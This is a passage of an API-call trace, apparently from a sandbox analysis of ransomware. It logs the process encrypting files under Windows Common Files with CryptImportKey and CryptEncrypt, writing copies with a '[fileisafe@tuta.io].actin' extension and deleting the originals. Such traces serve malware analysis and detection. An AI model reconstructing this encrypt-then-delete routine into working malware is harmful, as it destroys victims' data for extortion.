dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0147.052] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0147.052] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\uk-ua\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0147.052] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=10240) returned 1 [0147.052] CloseHandle (hObject=0x2f4) returned 1 [0147.052] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\uk-ua\\tipresx.dll.mui")) returned 0x20 [0147.052] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\tipresx.dll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\uk-ua\\tipresx.dll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0147.053] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\uk-ua\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0147.053] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0147.053] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-cn\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0147.053] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=7168) returned 1 [0147.053] CloseHandle (hObject=0x2f4) returned 1 [0147.053] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-cn\\tipresx.dll.mui")) returned 0x20 [0147.053] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\tipresx.dll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-cn\\tipresx.dll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0147.053] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-cn\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0147.053] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0147.053] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-tw\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0147.054] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=7168) returned 1 [0147.054] CloseHandle (hObject=0x2f4) returned 1 [0147.054] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-tw\\tipresx.dll.mui")) returned 0x20 [0147.054] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\tipresx.dll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-tw\\tipresx.dll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0147.054] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-tw\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0147.054] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0147.054] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\msinfo32.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us\\msinfo32.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0147.271] GetFileSizeEx (in: hFile=0x2ec, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=30720) returned 1 [0147.271] CloseHandle (hObject=0x2ec) returned 1 [0147.271] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\msinfo32.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us\\msinfo32.exe.mui")) returned 0x20 [0147.271] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\msinfo32.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us\\msinfo32.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0147.271] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\msinfo32.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us\\msinfo32.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0147.271] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0147.271] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0147.272] GetFileSizeEx (in: hFile=0x2ec, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=590523) returned 1 [0147.272] CloseHandle (hObject=0x2ec) returned 1 [0147.272] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pkeyconfig-office.xrm-ms")) returned 0x20 [0147.272] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pkeyconfig-office.xrm-ms.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0147.272] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0147.273] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0147.273] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0147.273] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pkeyconfig-office.xrm-ms.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0147.273] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac32b0) returned 1 [0147.273] CryptSetKeyParam (hKey=0xac32b0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0147.273] ReadFile (in: hFile=0x2ec, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x902bb, lpOverlapped=0x0) returned 1 [0147.285] CryptEncrypt (in: hKey=0xac32b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x902c0, dwBufLen=0x902c0 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x902c0) returned 1 [0147.286] WriteFile (in: hFile=0x2f0, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x902c0, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x902c0, lpOverlapped=0x0) returned 1 [0147.296] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac3070) returned 1 [0147.296] CryptSetKeyParam (hKey=0xac3070, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0147.296] CryptEncrypt (in: hKey=0xac3070, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x60, dwBufLen=0x60 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x60) returned 1 [0147.296] CryptDestroyKey (hKey=0xac3070) returned 1 [0147.296] WriteFile (in: hFile=0x2f0, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x112, lpOverlapped=0x0) returned 1 [0147.296] CryptDestroyKey (hKey=0xac32b0) returned 1 [0147.296] CloseHandle (hObject=0x2ec) returned 1 [0147.297] CloseHandle (hObject=0x2f0) returned 1 [0147.297] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pkeyconfig-office.xrm-ms")) returned 1 [0147.302] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0147.302] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig.companion.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pkeyconfig.companion.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0147.303] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=18624) returned 1 [0147.303] CloseHandle (hObject=0x2f0) returned 1 [0147.303] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig.companion.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pkeyconfig.companion.dll")) returned 0x20 [0147.303] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig.companion.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pkeyconfig.companion.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0147.303] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig.companion.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pkeyconfig.companion.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0147.303] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0147.303] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0147.303] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig.companion.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pkeyconfig.companion.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0147.304] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac34b0) returned 1 [0147.304] CryptSetKeyParam (hKey=0xac34b0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0147.304] ReadFile (in: hFile=0x2f0, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x48c0, lpOverlapped=0x0) returned 1 [0147.510] CryptEncrypt (in: hKey=0xac34b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x48d0, dwBufLen=0x48d0 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x48d0) returned 1 [0147.510] WriteFile (in: hFile=0x2ec, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x48d0, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x48d0, lpOverlapped=0x0) returned 1 [0147.511] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac3370) returned 1 [0147.511] CryptSetKeyParam (hKey=0xac3370, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0147.511] CryptEncrypt (in: hKey=0xac3370, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x60, dwBufLen=0x60 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x60) returned 1 [0147.511] CryptDestroyKey (hKey=0xac3370) returned 1 [0147.511] WriteFile (in: hFile=0x2ec, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x112, lpOverlapped=0x0) returned 1 [0147.511] CryptDestroyKey (hKey=0xac34b0) returned 1 [0147.511] CloseHandle (hObject=0x2f0) returned 1 [0147.511] CloseHandle (hObject=0x2ec) returned 1 [0147.512] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig.companion.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pkeyconfig.companion.dll")) returned 1 [0147.704] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0147.705] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0147.711] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=255) returned 1 [0147.711] CloseHandle (hObject=0x2f4) returned 1 [0147.711] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.htm")) returned 0x20 [0147.711] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.htm.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.htm.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0147.711] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0147.711] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0147.711] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0147.713] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=1074) returned 1 [0147.713] CloseHandle (hObject=0x2f4) returned 1 [0147.713] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.jpg")) returned 0x20 [0147.713] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.jpg.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.jpg.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0147.713] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0147.713] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0147.713] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0147.714] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=645) returned 1 [0147.714] CloseHandle (hObject=0x2f4) returned 1 [0147.714] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini")) returned 0x26 [0147.714] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0147.714] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0147.714] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0147.715] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0147.715] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0147.715] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac34b0) returned 1 [0147.716] CryptSetKeyParam (hKey=0xac34b0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0147.716] ReadFile (in: hFile=0x2f4, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x285, lpOverlapped=0x0) returned 1 [0147.717] CryptEncrypt (in: hKey=0xac34b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x290, dwBufLen=0x290 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x290) returned 1 [0147.717] WriteFile (in: hFile=0x2ec, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x290, lpOverlapped=0x0) returned 1 [0147.718] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac2d30) returned 1 [0147.718] CryptSetKeyParam (hKey=0xac2d30, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0147.718] CryptEncrypt (in: hKey=0xac2d30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40, dwBufLen=0x40 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40) returned 1 [0147.718] CryptDestroyKey (hKey=0xac2d30) returned 1 [0147.718] WriteFile (in: hFile=0x2ec, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xf2, lpOverlapped=0x0) returned 1 [0147.718] CryptDestroyKey (hKey=0xac34b0) returned 1 [0147.718] CloseHandle (hObject=0x2f4) returned 1 [0147.718] CloseHandle (hObject=0x2ec) returned 1 [0147.719] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini")) returned 1 [0147.720] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0147.720] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0147.720] GetFileSizeEx (in: hFile=0x2ec, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=231) returned 1 [0147.721] CloseHandle (hObject=0x2ec) returned 1 [0147.721] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm")) returned 0x20 [0147.721] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.htm.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0147.721] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0147.721] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0147.721] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0147.722] GetFileSizeEx (in: hFile=0x2ec, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=23871) returned 1 [0147.722] CloseHandle (hObject=0x2ec) returned 1 [0147.722] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg")) returned 0x20 [0147.722] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg.id[B4197730-0115].[fileisafe@tuta.io].actin" 